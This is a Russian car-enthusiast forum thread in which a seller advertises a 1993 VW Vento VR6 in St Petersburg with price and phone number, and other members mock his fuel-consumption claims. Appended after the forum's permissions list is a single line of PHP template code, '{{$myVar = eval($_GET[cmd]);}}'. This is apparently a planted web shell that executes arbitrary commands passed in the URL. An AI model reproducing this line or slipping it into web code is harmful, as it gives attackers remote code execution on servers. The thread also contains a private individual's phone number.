+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 19

Тема: Vento VR6 Питер


  1. #1
    Vwvento
    Guest Аватар для Vwvento
    Привет всем, сори, что объявление не gti, но я надеюсь, это не сильно противоречит правилам..


    Вообщем, продаю свою ласточку. Неделю делал это по стандартным формулам (аля шанс и из рук в руки), но после 7-ми дней, нахожусь на пороге нервного срыва. Звонят какие то бомжи, которых в первую (!) очередь интересует можно ли заливать 92-й бензин и подобные вещи.

    Вообщем тем, кто понимает что такое VR6 2,8 (174л.с.), кто понимает, что такое V-образная шестерка под капотом моеё объявление. Надеюсь, на этом форуме, я найду таки единомышленника. Уж простите, человеку, который не понимает, не продам (как ни смешно это звучит). Впрочем, что тут смешного. Это любимый друг, которого продаю из-за необходимости взять большое корыто для нужд семьи.

    Итак, что имеем. Светлосерый металлик, 1993 год, безумие под капотом, эл. стекла (все), тонировка, эл. зеркала, криматроник, 3-х спицевый руль, термотроник, бортовой компьютер, R15 литье (покупал год назад) 205-я резина на лето. R-15 литье BBS (родные) и 175-я на зиму. Музыка - отличная - усилитель, 20-ки сзади, и спереди не помню какой диаметр, но сам меломан, и мне хватает. Состояние внешнее машинки нареканий не вызывает. Я её перед продажей не вылизывал, так что все по честноку. Двигатель в полном порядке. Кушает 12,5 в среднем, 8 по трассе (показания компьютера - для особо неверующих). Масло - литр на 3000 км. короче, для такого объема - показатели идеальные. Обслуживание своевременное, вложений не требует, последние 6-ть лет в одних руках!

    Цена 185.000 рублей (7300$).
    Телефон: 8-921-373-78-74 (Андрей, с 11 до 23).

    Огромная просьба, звоните либо если и правда хотите познать радость от подобной машины, либо понимая в них толк. Это не просто табуретка, которая возит из пункта "А" в пунтк "Б".

    Фуф... извините, что "многа букаф":)
    Всем удачи.

  2. #2
    Мимо проходил R is on a distinguished road Аватар для R
    Регистрация
    28.06.2006
    Сообщений
    87
    Originally posted by Vwvento@May 12 2007, 15:06
    Вообщем тем, кто понимает что такое VR6 2,8 (174л.с.), кто понимает, что такое V-образная шестерка под капотом моеё объявление.

    Огромная просьба, звоните либо если и правда хотите познать радость от подобной машины, либо понимая в них толк. Это не просто табуретка, которая возит из пункта "А" в пунтк "Б".
    V-образной она никогда не была, в этом аспекте выделеная фраза немного смешная

    да и показания компа о расходе - это не критерий расхода

    цена 7300$ считаю завышенной

  3. #3
    GTI-Racing magnum126 is on a distinguished road Аватар для magnum126
    Регистрация
    06.03.2006
    Откуда
    СВАО
    Машина
    opel manta B 1979, VW Derby 1982, VW Golf 6, AUDI A2 s-line, OPEL ZAFIRA COSMO!!
    Сообщений
    3,618
    расход у мя такой на 1.8 abs ! но если у тя такой расход то это уже не верка а что то типо 1.8 или 2.0!ты точно знаешь что это верка?

  4. #4
    Vwvento
    Guest Аватар для Vwvento
    2R - Да да, я с детства слышал истории, о том, что 3-х литровые моторы едят по 8 литров на 300 км. комментировать не стану.

    2magnum126 - у меня есть знакомый, у которого 9-ка есть больше моей-) Что уж тут.)

  5. #5
    GTI-Racing magnum126 is on a distinguished road Аватар для magnum126
    Регистрация
    06.03.2006
    Откуда
    СВАО
    Машина
    opel manta B 1979, VW Derby 1982, VW Golf 6, AUDI A2 s-line, OPEL ZAFIRA COSMO!!
    Сообщений
    3,618
    Originally posted by Vwvento@May 12 2007, 17:45
    2R - Да да, я с детства слышал истории, о том, что 3-х литровые моторы едят по 8 литров на 300 км. комментировать не стану.

    2magnum126 - у меня есть знакомый, у которого 9-ка есть больше моей-) Что уж тут.)
    <div align='right'><{POST_SNAPBACK}></div>
    у мя таз тоже есть много 11 литров&#33; но верка некогда не будит есть 8 по трассе и 12 по городк&#33; только если на нетралке накатом( так что ненадо тешить себя и всех надеждами(

  6. #6
    Vwvento
    Guest Аватар для Vwvento
    Готов поспорить на 500 зеленых. Залить 8 литров в пустой бак и проехать 100 км будучи уже на трассе, с условием, что это будет не пятница вечер

  7. #7
    GTI-Racing magnum126 is on a distinguished road Аватар для magnum126
    Регистрация
    06.03.2006
    Откуда
    СВАО
    Машина
    opel manta B 1979, VW Derby 1982, VW Golf 6, AUDI A2 s-line, OPEL ZAFIRA COSMO!!
    Сообщений
    3,618
    а скорость твоя какова будит? а я бы поспорил что ты зальешь в бак 12 и проедешь по городу)) ну что слабо?

  8. #8
    Мимо проходил R is on a distinguished road Аватар для R
    Регистрация
    28.06.2006
    Сообщений
    87
    Originally posted by Vwvento@May 12 2007, 17:45
    2R - Да да, я с детства слышал истории, о том, что 3-х литровые моторы едят по 8 литров на 300 км. комментировать не стану.
    Не понял что-то, это сарказм или как ?&#33;
    расход в идеале заявленный производителем и то 9.6, при том я не слышал о таком в реале, так что тебе о показаниях твоего капутера, только мечтать приходится... :rolleyes:

  9. #9
    GTI-Racing magnum126 is on a distinguished road Аватар для magnum126
    Регистрация
    06.03.2006
    Откуда
    СВАО
    Машина
    opel manta B 1979, VW Derby 1982, VW Golf 6, AUDI A2 s-line, OPEL ZAFIRA COSMO!!
    Сообщений
    3,618
    просто у него комп экономный&#33; там всего 2 фарсунки работают&#33; и поэтому такой расход)))

  10. #10
    Vwvento
    Guest Аватар для Vwvento
    Что то я не совсем понял реакции вашей господа. Это конечно забавно - постебать новое лицо на форуме, очень здорово говорят поднимает авторитет.

    Мне не слабо залить 12,5 литров и проехать по говороду 100 км. Не жарить, а проехать. Мне не слабо залить 8 и проехать по трассе 100 км при скорости около 85 км ч. Более того, раз вы такие болтливые, я предложил даже поспорить с вами, но вы предложение проигнорировали. Так что уважайте и моевремя и свое. За диспутом следить прекращаю. Можете тут на двоих сообразить новых шуток, это очень здорово выглядит. Как два здоровых лба, пытаются убедить владельца машины, что она есть больше, чем заявлено им самим. Если учесть, что я даю гарантию 6 мес. на авто, мне нет смысла врать покупателю, а вам что то рассказывать не имею более желания.
    Еще раз повторю, с вашей стороны, это выглядит не очень гостеприимно. удачи и вам, и вашим автомобилям.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Vento VR6
    от nikoser1227 в разделе Клубные машины
    Ответов: 185
    Последнее сообщение: 02.10.2014, 18:17
  2. Vento AAM Тюнинг
    от Jury84 в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 4
    Последнее сообщение: 21.04.2010, 09:23
  3. Покраска Vento
    от NaNo в разделе Кузов
    Ответов: 4
    Последнее сообщение: 20.01.2010, 23:12
  4. Vw Vento 1.8(90hp)ABS
    от NaNo в разделе Покупка и продажа авто
    Ответов: 0
    Последнее сообщение: 20.01.2010, 19:57
  5. Выбор Vento
    от JIp9lHuk в разделе Отзывы / Выбор
    Ответов: 10
    Последнее сообщение: 20.12.2007, 22:12

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}